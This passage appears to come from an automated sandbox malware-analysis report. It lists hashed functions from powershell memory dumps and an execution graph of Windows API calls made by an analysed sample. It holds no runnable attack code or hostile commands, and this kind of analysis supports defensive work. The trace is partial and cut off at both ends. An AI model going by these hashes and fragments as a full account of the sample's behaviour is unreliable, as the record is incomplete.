                                                  • Opcode Fuzzy Hash: 9bb82f405075d1d6138300d977a5ae925768b5ffd4f4c4d5caa04f7c1950b12c
                                                  • Instruction Fuzzy Hash: 21012DB4700219DBDB24CB54C859FA9B7B2EB85305F2084A9D906AF381C77AADC5CF51
                                                  Function 04D92CB6 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 615494394958cb9a68121b5124a0a850917c85593a4197ccb83374f53266fcfa
                                                  • Instruction ID: b8bd7c60bed58ba737487bfe88762ea8976dd8cf6580889ffb84aad2215216d1
                                                  • Opcode Fuzzy Hash: 615494394958cb9a68121b5124a0a850917c85593a4197ccb83374f53266fcfa
                                                  • Instruction Fuzzy Hash: 08F0DA35A001099FCB15CF9DD890AEEF7B1FF88324F248159E515A76A1C732AC52CB50
                                                  Function 076F17F8 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 132d72be54fe3757d0abc4c99b5cc18d1f99c86333c9d83218962c2269ecd04c
                                                  • Instruction ID: c84deb50a76634600186acb022a062beb34760f481ceee9b5bb54a3f8e9b470f
                                                  • Opcode Fuzzy Hash: 132d72be54fe3757d0abc4c99b5cc18d1f99c86333c9d83218962c2269ecd04c
                                                  • Instruction Fuzzy Hash: 5DB012301051404FC241CB10CC50460BB20DF82104318C0CBD8048B253CB23EE07D700

                                                  Non-executed Functions

                                                  Function 076F3D70 Relevance: 12.7, Strings: 10, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$ 1l$4\2l$4\2l$4\2l$4\2l$@b2l$@b2l$@b2l$@b2l
                                                  • API String ID: 0-1637995894
                                                  • Opcode ID: e8fd3249db5bbdec6a3f002318c072538966c32593510c75a1458a5788f51dab
                                                  • Instruction ID: 74b6465ee7ecb498391bb38bd65e2bce11bb19c6859be9ff8bf755190bca3fbd
                                                  • Opcode Fuzzy Hash: e8fd3249db5bbdec6a3f002318c072538966c32593510c75a1458a5788f51dab
                                                  • Instruction Fuzzy Hash: 4A716DB4A01209DFCB14CF69C485AAEBBF2AF89310F148566EA166F355CB35DC41CF91
                                                  Function 076F6F90 Relevance: 9.2, Strings: 7, Instructions: 473COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DO2l$DO2l$x5"k$G2l$G2l$G2l$G2l
                                                  • API String ID: 0-856915332
                                                  • Opcode ID: e8f8fe2ff96f080dfde628e85186d0b6bc6c12baff6964a7778b29f3f96ca2f8
                                                  • Instruction ID: 68538eb02daa6845f7009a508a139d939a5e0ff5fff58eb0b997163e3f738521
                                                  • Opcode Fuzzy Hash: e8f8fe2ff96f080dfde628e85186d0b6bc6c12baff6964a7778b29f3f96ca2f8
                                                  • Instruction Fuzzy Hash: 00F15EB17052069FCB259B78C80166ABFA2AFC2311F5880BBDB56DB342DB35C945C7A1
                                                  Function 076FD408 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$ 1l$G2l$G2l$G2l$G2l
                                                  • API String ID: 0-2764381344
                                                  • Opcode ID: 0fba6bebc33b7f23d56c75295f8fe0d6c70f3f40418fad89ecafd2ee5edf1959
                                                  • Instruction ID: 6f941be55ae6b31e8c60d47d7ac2f11c66d662bb0652e55dbfd99617b8b87ebb
                                                  • Opcode Fuzzy Hash: 0fba6bebc33b7f23d56c75295f8fe0d6c70f3f40418fad89ecafd2ee5edf1959
                                                  • Instruction Fuzzy Hash: 2EF129B1704349DFDB159F78C82076A7BE1BF86311F14C46AE6168B391CB35E941CBA1
                                                  Function 08E314E0 Relevance: 7.9, Strings: 6, Instructions: 391COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$P00l$P00l$G2l$G2l
                                                  • API String ID: 0-790579512
                                                  • Opcode ID: d2b0b312adc1bb270e6e2a59c473c8e3a6ac4b72559500297972ac8ffb4cef49
                                                  • Instruction ID: 7139b2b5fb65ed7e54e6ec2ea82fb335c9b041798e63dd954d6a748992d8a894
                                                  • Opcode Fuzzy Hash: d2b0b312adc1bb270e6e2a59c473c8e3a6ac4b72559500297972ac8ffb4cef49
                                                  • Instruction Fuzzy Hash: E5D1D436700224EFCB159F68C4046AABBA2FFC4352F24846EF9569B395CB32DD41CB91
                                                  Function 076FF470 Relevance: 7.8, Strings: 6, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$4\2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1712132697
                                                  • Opcode ID: 9040dd21c3ad1990383ce531055621dce299b29d824b736a8b8fd173236274a4
                                                  • Instruction ID: e240b5e530df3288804bdb09ba1907d1906862dd1da14fdbbc2515ffeb34844f
                                                  • Opcode Fuzzy Hash: 9040dd21c3ad1990383ce531055621dce299b29d824b736a8b8fd173236274a4
                                                  • Instruction Fuzzy Hash: 32B12DB4A0020ADFDB14CF64C551AA9F7F2FF89314F14C56AEA166B754C736A842CF90
                                                  Function 08E305E8 Relevance: 7.8, Strings: 6, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$P00l$P00l$G2l$G2l
                                                  • API String ID: 0-790579512
                                                  • Opcode ID: 04da5078f5678da07aa7ba9af5737ee948a08037f9371eea836ba906af2b699b
                                                  • Instruction ID: 483318a427586360e361398eff2b6aa7d5b90d131a07ebd59e6e91a21c47f028
                                                  • Opcode Fuzzy Hash: 04da5078f5678da07aa7ba9af5737ee948a08037f9371eea836ba906af2b699b
                                                  • Instruction Fuzzy Hash: B891E476B00624DFCB14DB58C404AAABBE2BFC8316F25C46DE9169B385CB31DD42CB90
                                                  Function 076F58F0 Relevance: 7.7, Strings: 6, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4\2l$4\2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1940569027
                                                  • Opcode ID: eba404689188eab16cffbae19822cda54c0780ee434aec08f69d31dacd24d2e5
                                                  • Instruction ID: 496bc2c046c7a39069786ddbe230ade2699f02f94ce894cd15bb8376ffac76f3
                                                  • Opcode Fuzzy Hash: eba404689188eab16cffbae19822cda54c0780ee434aec08f69d31dacd24d2e5
                                                  • Instruction Fuzzy Hash: 859170B0A01209DFCB14CB68C085AAAB7F2BF89315F148469DA17AF756CB35DC62CF51
                                                  Function 076F3D65 Relevance: 6.4, Strings: 5, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1364940662
                                                  • Opcode ID: 247569f0fed1a098678ee13b7fa61ac57d4c2452ff9e5e5a21b0d38f612ac85b
                                                  • Instruction ID: 9170ed7e3d34884f43d4f2c73627a9193f890a98287c0c6e3caa5cb997532b3a
                                                  • Opcode Fuzzy Hash: 247569f0fed1a098678ee13b7fa61ac57d4c2452ff9e5e5a21b0d38f612ac85b
                                                  • Instruction Fuzzy Hash: AE617DB4A01209DFDB14CF69C485AA9FBF2BF49314F18856AEA166B355CB31E891CF40
                                                  Function 076F86C4 Relevance: 6.3, Strings: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $I'k$?4l$?4l$?4l$G2l
                                                  • API String ID: 0-223816410
                                                  • Opcode ID: c3d1ffc726da3468dc3f558f91354599d27aa22894b24170b324507550722c01
                                                  • Instruction ID: 405e8941f89b2f6fa8004244bb35f3fedc069fc7793e15c69c11dce6ed87f6fa
                                                  • Opcode Fuzzy Hash: c3d1ffc726da3468dc3f558f91354599d27aa22894b24170b324507550722c01
                                                  • Instruction Fuzzy Hash: E911D6B9A052078FCB108B6D8402B6ABFE5AB82311F1480E9D6169B641D735C881CBD2
                                                  Function 076F8A28 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G2l$G2l$G2l$G2l
                                                  • API String ID: 0-601823172
                                                  • Opcode ID: de1ae58a82445745244e825d00cc733a14ff75c25177c47a0c3643e7fabcd4d4
                                                  • Instruction ID: 5ee462500f970d328c7d50dbd903a85a5af8b633a7985eb9f837214fc7be087e
                                                  • Opcode Fuzzy Hash: de1ae58a82445745244e825d00cc733a14ff75c25177c47a0c3643e7fabcd4d4
                                                  • Instruction Fuzzy Hash: 4ED149B17053469FCB259B78840166ABBE6AFC2211F1484BBDB57CF782CA35D841C7A1
                                                  Function 076F29C8 Relevance: 5.3, Strings: 4, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$\}-l$\}-l
                                                  • API String ID: 0-2237593516
                                                  • Opcode ID: 8e6c0ef036e0c4e0c474d97697e170c0b1b72eaf93729c3aa7ae181974109921
                                                  • Instruction ID: cfcb82a12df8bd0483b81a39b51077f7bf5592dba1a73728b3211cbbcb59c7fe
                                                  • Opcode Fuzzy Hash: 8e6c0ef036e0c4e0c474d97697e170c0b1b72eaf93729c3aa7ae181974109921
                                                  • Instruction Fuzzy Hash: 10913CB17043169FCB158E79C460B6EBBE6BFC5311F24806AEA069B395CA31DC41CFA1

                                                  Execution Graph

                                                  Execution Coverage:6.1%
                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:60
                                                  execution_graph 40648 441819 40651 430737 40648->40651 40650 441825 40652 430756 40651->40652 40664 43076d 40651->40664 40653 430774 40652->40653 40654 43075f 40652->40654 40666 43034a memcpy 40653->40666 40665 4169a7 11 API calls 40654->40665 40657 4307ce 40658 430819 memset 40657->40658 40667 415b2c 11 API calls 40657->40667 40658->40664 40659 43077e 40659->40657 40662 4307fa 40659->40662 40659->40664 40661 4307e9 40661->40658 40661->40664 40668 4169a7 11 API calls 40662->40668 40664->40650 40665->40664 40666->40659 40667->40661 40668->40664 37670 442ec6 19 API calls 37844 4152c6 malloc 37845 4152e2 37844->37845 37846 4152ef 37844->37846 37848 416760 11 API calls 37846->37848 37848->37845 38456 4466f4 38475 446904 38456->38475 38458 446700 GetModuleHandleA 38461 446710 __set_app_type __p__fmode __p__commode 38458->38461 38460 4467a4 38462 4467ac __setusermatherr 38460->38462 38463 4467b8 38460->38463 38461->38460 38462->38463 38476 4468f0 _controlfp 38463->38476 38465 4467bd _initterm __wgetmainargs _initterm 38467 44681e GetStartupInfoW 38465->38467 38468 446810 38465->38468 38469 446866 GetModuleHandleA 38467->38469 38477 41276d 38469->38477 38473 446896 exit 38474 44689d _cexit 38473->38474 38474->38468 38475->38458 38476->38465 38478 41277d 38477->38478 38520 4044a4 LoadLibraryW 38478->38520 38480 412785 38512 412789 38480->38512 38528 414b81 38480->38528 38483 4127c8 38534 412465 memset ??2@YAPAXI 38483->38534 38485 4127ea 38546 40ac21 38485->38546 38490 412813 38564 40dd07 memset 38490->38564 38491 412827 38569 40db69 memset 38491->38569 38494 412822 38590 4125b6 ??3@YAXPAX 38494->38590 38496 40ada2 _wcsicmp 38497 41283d 38496->38497 38497->38494 38500 412863 CoInitialize 38497->38500 38574 41268e 38497->38574 38594 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38500->38594 38504 41296f 38596 40b633 38504->38596 38507 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38511 412957 38507->38511 38517 4128ca 38507->38517 38511->38494 38512->38473 38512->38474 38513 4128d0 TranslateAcceleratorW 38514 412941 GetMessageW 38513->38514 38513->38517 38514->38511 38514->38513 38515 412909 IsDialogMessageW 38515->38514 38515->38517 38516 4128fd IsDialogMessageW 38516->38514 38516->38515 38517->38513 38517->38515 38517->38516 38518 41292b TranslateMessage DispatchMessageW 38517->38518 38519 41291f IsDialogMessageW 38517->38519 38518->38514 38519->38514 38519->38518 38521 4044cf GetProcAddress 38520->38521 38524 4044f7 38520->38524 38522 4044e8 FreeLibrary 38521->38522 38525 4044df 38521->38525 38523 4044f3 38522->38523 38522->38524 38523->38524 38526 404507 MessageBoxW 38524->38526 38527 40451e 38524->38527 38525->38522 38526->38480 38527->38480 38529 414b8a 38528->38529 38530 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38528->38530 38600 40a804 memset 38529->38600 38530->38483 38533 414b9e GetProcAddress 38533->38530 38535 4124e0 38534->38535 38536 412505 ??2@YAPAXI 38535->38536 38537 41251c 38536->38537 38539 412521 38536->38539 38622 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38537->38622 38611 444722 38539->38611 38545 41259b wcscpy 38545->38485 38627 40b1ab ??3@YAXPAX ??3@YAXPAX 38546->38627 38550 40ad4b 38559 40ad76 38550->38559 38640 40a9ce 38550->38640 38551 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38557 40ac5c 38551->38557 38553 40ace7 ??3@YAXPAX 38553->38557 38557->38550 38557->38551 38557->38553 38557->38559 38631 40a8d0 7 API calls 38557->38631 38632 4099f4 38557->38632 38628 40aa04 38559->38628 38560 40ada2 38561 40adc9 38560->38561 38562 40adaa 38560->38562 38561->38490 38561->38491 38562->38561 38563 40adb3 _wcsicmp 38562->38563 38563->38561 38563->38562 38646 40dce0 38564->38646 38566 40dd3a GetModuleHandleW 38651 40dba7 38566->38651 38570 40dce0 3 API calls 38569->38570 38571 40db99 38570->38571 38723 40dae1 38571->38723 38737 402f3a 38574->38737 38576 412766 38576->38494 38576->38500 38577 4126d3 _wcsicmp 38578 4126a8 38577->38578 38578->38576 38578->38577 38580 41270a 38578->38580 38771 4125f8 7 API calls 38578->38771 38580->38576 38740 411ac5 38580->38740 38591 4125da 38590->38591 38592 4125f0 38591->38592 38593 4125e6 DeleteObject 38591->38593 38595 40b1ab ??3@YAXPAX ??3@YAXPAX 38592->38595 38593->38592 38594->38507 38595->38504 38597 40b640 38596->38597 38598 40b639 ??3@YAXPAX 38596->38598 38599 40b1ab ??3@YAXPAX ??3@YAXPAX 38597->38599 38598->38597 38599->38512 38601 40a83b GetSystemDirectoryW 38600->38601 38602 40a84c wcscpy 38600->38602 38601->38602 38607 409719 wcslen 38602->38607 38605 40a881 LoadLibraryW 38606 40a886 38605->38606 38606->38530 38606->38533 38608 409724 38607->38608 38609 409739 wcscat LoadLibraryW 38607->38609 38608->38609 38610 40972c wcscat 38608->38610 38609->38605 38609->38606 38610->38609 38612 444732 38611->38612 38613 444728 DeleteObject 38611->38613 38623 409cc3 38612->38623 38613->38612 38615 412551 38616 4010f9 38615->38616 38617 401130 38616->38617 38618 401134 GetModuleHandleW LoadIconW 38617->38618 38619 401107 wcsncat 38617->38619 38620 40a7be 38618->38620 38619->38617 38621 40a7d2 38620->38621 38621->38545 38621->38621 38622->38539 38626 409bfd memset wcscpy 38623->38626 38625 409cdb CreateFontIndirectW 38625->38615 38626->38625 38627->38557 38629 40aa14 38628->38629 38630 40aa0a ??3@YAXPAX 38628->38630 38629->38560 38630->38629 38631->38557 38633 409a41 38632->38633 38634 4099fb malloc 38632->38634 38633->38557 38636 409a37 38634->38636 38637 409a1c 38634->38637 38636->38557 38638 409a30 ??3@YAXPAX 38637->38638 38639 409a20 memcpy 38637->38639 38638->38636 38639->38638 38641 40a9e7 38640->38641 38642 40a9dc ??3@YAXPAX 38640->38642 38644 4099f4 3 API calls 38641->38644 38643 40a9f2 38642->38643 38645 40a8d0 7 API calls 38643->38645 38644->38643 38645->38559 38670 409bca GetModuleFileNameW 38646->38670 38648 40dce6 wcsrchr 38649 40dcf5 38648->38649 38650 40dcf9 wcscat 38648->38650 38649->38650 38650->38566 38671 44db70 38651->38671 38655 40dbfd 38674 4447d9 38655->38674 38658 40dc34 wcscpy wcscpy 38700 40d6f5 38658->38700 38659 40dc1f wcscpy 38659->38658 38662 40d6f5 3 API calls 38663 40dc73 38662->38663 38664 40d6f5 3 API calls 38663->38664 38665 40dc89 38664->38665 38666 40d6f5 3 API calls 38665->38666 38667 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38666->38667 38706 40da80 38667->38706 38670->38648 38672 40dbb4 memset memset 38671->38672 38673 409bca GetModuleFileNameW 38672->38673 38673->38655 38676 4447f4 38674->38676 38675 40dc1b 38675->38658 38675->38659 38676->38675 38677 444807 ??2@YAPAXI 38676->38677 38678 44481f 38677->38678 38679 444873 _snwprintf 38678->38679 38680 4448ab wcscpy 38678->38680 38713 44474a 8 API calls 38679->38713 38682 4448bb 38680->38682 38714 44474a 8 API calls 38682->38714 38683 4448a7 38683->38680 38683->38682 38685 4448cd 38715 44474a 8 API calls 38685->38715 38687 4448e2 38716 44474a 8 API calls 38687->38716 38689 4448f7 38717 44474a 8 API calls 38689->38717 38691 44490c 38718 44474a 8 API calls 38691->38718 38693 444921 38719 44474a 8 API calls 38693->38719 38695 444936 38720 44474a 8 API calls 38695->38720 38697 44494b 38721 44474a 8 API calls 38697->38721 38699 444960 ??3@YAXPAX 38699->38675 38701 44db70 38700->38701 38702 40d702 memset GetPrivateProfileStringW 38701->38702 38703 40d752 38702->38703 38704 40d75c WritePrivateProfileStringW 38702->38704 38703->38704 38705 40d758 38703->38705 38704->38705 38705->38662 38707 44db70 38706->38707 38708 40da8d memset 38707->38708 38709 40daac LoadStringW 38708->38709 38710 40dac6 38709->38710 38710->38709 38712 40dade 38710->38712 38722 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38710->38722 38712->38494 38713->38683 38714->38685 38715->38687 38716->38689 38717->38691 38718->38693 38719->38695 38720->38697 38721->38699 38722->38710 38733 409b98 GetFileAttributesW 38723->38733 38725 40daea 38726 40db63 38725->38726 38727 40daef wcscpy wcscpy GetPrivateProfileIntW 38725->38727 38726->38496 38734 40d65d GetPrivateProfileStringW 38727->38734 38729 40db3e 38735 40d65d GetPrivateProfileStringW 38729->38735 38731 40db4f 38736 40d65d GetPrivateProfileStringW 38731->38736 38733->38725 38734->38729 38735->38731 38736->38726 38772 40eaff 38737->38772 38741 411ae2 memset 38740->38741 38742 411b8f 38740->38742 38812 409bca GetModuleFileNameW 38741->38812 38754 411a8b 38742->38754 38744 411b0a wcsrchr 38745 411b22 wcscat 38744->38745 38746 411b1f 38744->38746 38813 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38745->38813 38746->38745 38748 411b67 38814 402afb 38748->38814 38752 411b7f 38870 40ea13 SendMessageW memset SendMessageW 38752->38870 38755 402afb 27 API calls 38754->38755 38756 411ac0 38755->38756 38757 4110dc 38756->38757 38758 41113e 38757->38758 38763 4110f0 38757->38763 38895 40969c LoadCursorW SetCursor 38758->38895 38760 411143 38896 4032b4 38760->38896 38914 444a54 38760->38914 38761 4110f7 _wcsicmp 38761->38763 38762 411157 38764 40ada2 _wcsicmp 38762->38764 38763->38758 38763->38761 38917 410c46 10 API calls 38763->38917 38767 411167 38764->38767 38765 4111af 38767->38765 38768 4111a6 qsort 38767->38768 38768->38765 38771->38578 38773 40eb10 38772->38773 38785 40e8e0 38773->38785 38776 40eb6c memcpy memcpy 38777 40ebb7 38776->38777 38777->38776 38778 40ebf2 ??2@YAPAXI ??2@YAPAXI 38777->38778 38781 40d134 16 API calls 38777->38781 38779 40ec2e ??2@YAPAXI 38778->38779 38782 40ec65 38778->38782 38779->38782 38781->38777 38782->38782 38795 40ea7f 38782->38795 38784 402f49 38784->38578 38786 40e8f2 38785->38786 38787 40e8eb ??3@YAXPAX 38785->38787 38788 40e900 38786->38788 38789 40e8f9 ??3@YAXPAX 38786->38789 38787->38786 38790 40e911 38788->38790 38791 40e90a ??3@YAXPAX 38788->38791 38789->38788 38792 40e931 ??2@YAPAXI ??2@YAPAXI 38790->38792 38793 40e921 ??3@YAXPAX 38790->38793 38794 40e92a ??3@YAXPAX 38790->38794 38791->38790 38792->38776 38793->38794 38794->38792 38796 40aa04 ??3@YAXPAX 38795->38796 38797 40ea88 38796->38797 38798 40aa04 ??3@YAXPAX 38797->38798 38799 40ea90 38798->38799 38800 40aa04 ??3@YAXPAX 38799->38800 38801 40ea98 38800->38801 38802 40aa04 ??3@YAXPAX 38801->38802 38803 40eaa0 38802->38803 38804 40a9ce 4 API calls 38803->38804 38805 40eab3 38804->38805 38806 40a9ce 4 API calls 38805->38806 38807 40eabd 38806->38807 38808 40a9ce 4 API calls 38807->38808 38809 40eac7 38808->38809 38810 40a9ce 4 API calls 38809->38810 38811 40ead1 38810->38811 38811->38784 38812->38744 38813->38748 38871 40b2cc 38814->38871 38816 402b0a 38817 40b2cc 27 API calls 38816->38817 38818 402b23 38817->38818 38819 40b2cc 27 API calls 38818->38819 38820 402b3a 38819->38820 38821 40b2cc 27 API calls 38820->38821 38822 402b54 38821->38822 38823 40b2cc 27 API calls 38822->38823 38824 402b6b 38823->38824 38825 40b2cc 27 API calls 38824->38825 38826 402b82 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 402b99 38827->38828 38829 40b2cc 27 API calls 38828->38829 38830 402bb0 38829->38830 38831 40b2cc 27 API calls 38830->38831 38832 402bc7 38831->38832 38833 40b2cc 27 API calls 38832->38833 38834 402bde 38833->38834 38835 40b2cc 27 API calls 38834->38835 38836 402bf5 38835->38836 38837 40b2cc 27 API calls 38836->38837 38838 402c0c 38837->38838 38839 40b2cc 27 API calls 38838->38839 38840 402c23 38839->38840 38841 40b2cc 27 API calls 38840->38841 38842 402c3a 38841->38842 38843 40b2cc 27 API calls 38842->38843 38844 402c51 38843->38844 38845 40b2cc 27 API calls 38844->38845 38846 402c68 38845->38846 38847 40b2cc 27 API calls 38846->38847 38848 402c7f 38847->38848 38849 40b2cc 27 API calls 38848->38849 38850 402c99 38849->38850 38851 40b2cc 27 API calls 38850->38851 38852 402cb3 38851->38852 38853 40b2cc 27 API calls 38852->38853 38854 402cd5 38853->38854 38855 40b2cc 27 API calls 38854->38855 38856 402cf0 38855->38856 38857 40b2cc 27 API calls 38856->38857 38858 402d0b 38857->38858 38859 40b2cc 27 API calls 38858->38859 38860 402d26 38859->38860 38861 40b2cc 27 API calls 38860->38861 38862 402d3e 38861->38862 38863 40b2cc 27 API calls 38862->38863 38864 402d59 38863->38864 38865 40b2cc 27 API calls 38864->38865 38866 402d78 38865->38866 38867 40b2cc 27 API calls 38866->38867 38868 402d93 38867->38868 38869 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38868->38869 38869->38752 38870->38742 38874 40b58d 38871->38874 38873 40b2d1 38873->38816 38875 40b5a4 GetModuleHandleW FindResourceW 38874->38875 38876 40b62e 38874->38876 38877 40b5c2 LoadResource 38875->38877 38879 40b5e7 38875->38879 38876->38873 38878 40b5d0 SizeofResource LockResource 38877->38878 38877->38879 38878->38879 38879->38876 38887 40afcf 38879->38887 38881 40b608 memcpy 38890 40b4d3 memcpy 38881->38890 38883 40b61e 38891 40b3c1 18 API calls 38883->38891 38885 40b626 38892 40b04b 38885->38892 38888 40b04b ??3@YAXPAX 38887->38888 38889 40afd7 ??2@YAPAXI 38888->38889 38889->38881 38890->38883 38891->38885 38893 40b051 ??3@YAXPAX 38892->38893 38894 40b05f 38892->38894 38893->38894 38894->38876 38895->38760 38897 4032c4 38896->38897 38898 40b633 ??3@YAXPAX 38897->38898 38899 403316 38898->38899 38918 44553b 38899->38918 38903 403480 39114 40368c 15 API calls 38903->39114 38905 403489 38906 40b633 ??3@YAXPAX 38905->38906 38907 403495 38906->38907 38907->38762 38908 4033a9 memset memcpy 38909 4033ec wcscmp 38908->38909 38910 40333c 38908->38910 38909->38910 38910->38903 38910->38908 38910->38909 39112 4028e7 11 API calls 38910->39112 39113 40f508 6 API calls 38910->39113 38912 403421 _wcsicmp 38912->38910 38915 444a64 FreeLibrary 38914->38915 38916 444a83 38914->38916 38915->38916 38916->38762 38917->38763 38919 445548 38918->38919 38920 445599 38919->38920 39115 40c768 38919->39115 38921 4455a8 memset 38920->38921 38928 4457f2 38920->38928 39198 403988 38921->39198 38932 445854 38928->38932 39300 403e2d memset memset memset memset memset 38928->39300 38929 445672 39209 403fbe memset memset memset memset memset 38929->39209 38930 4458bb memset memset 38936 414c2e 16 API calls 38930->38936 38981 4458aa 38932->38981 39323 403c9c memset memset memset memset memset 38932->39323 38934 44595e memset memset 38941 414c2e 16 API calls 38934->38941 38935 4455e5 38935->38929 38944 44560f 38935->38944 38937 4458f9 38936->38937 38942 40b2cc 27 API calls 38937->38942 38939 445a00 memset memset 39346 414c2e 38939->39346 38940 445b22 38946 445bca 38940->38946 38947 445b38 memset memset memset 38940->38947 38951 44599c 38941->38951 38952 445909 38942->38952 38955 4087b3 338 API calls 38944->38955 38945 445849 39410 40b1ab ??3@YAXPAX ??3@YAXPAX 38945->39410 38953 445c8b memset memset 38946->38953 39020 445cf0 38946->39020 38956 445bd4 38947->38956 38957 445b98 38947->38957 38960 40b2cc 27 API calls 38951->38960 38961 409d1f 6 API calls 38952->38961 38964 414c2e 16 API calls 38953->38964 38954 44589f 39411 40b1ab ??3@YAXPAX ??3@YAXPAX 38954->39411 38962 445621 38955->38962 38970 414c2e 16 API calls 38956->38970 38957->38956 38966 445ba2 38957->38966 38963 4459ac 38960->38963 38974 445919 38961->38974 39396 4454bf 20 API calls 38962->39396 38976 409d1f 6 API calls 38963->38976 38977 445cc9 38964->38977 39483 4099c6 wcslen 38966->39483 38967 4456b2 39398 40b1ab ??3@YAXPAX ??3@YAXPAX 38967->39398 38969 40b2cc 27 API calls 38982 445a4f 38969->38982 38984 445be2 38970->38984 38971 403335 39111 4452e5 45 API calls 38971->39111 38972 445d3d 39004 40b2cc 27 API calls 38972->39004 38973 445d88 memset 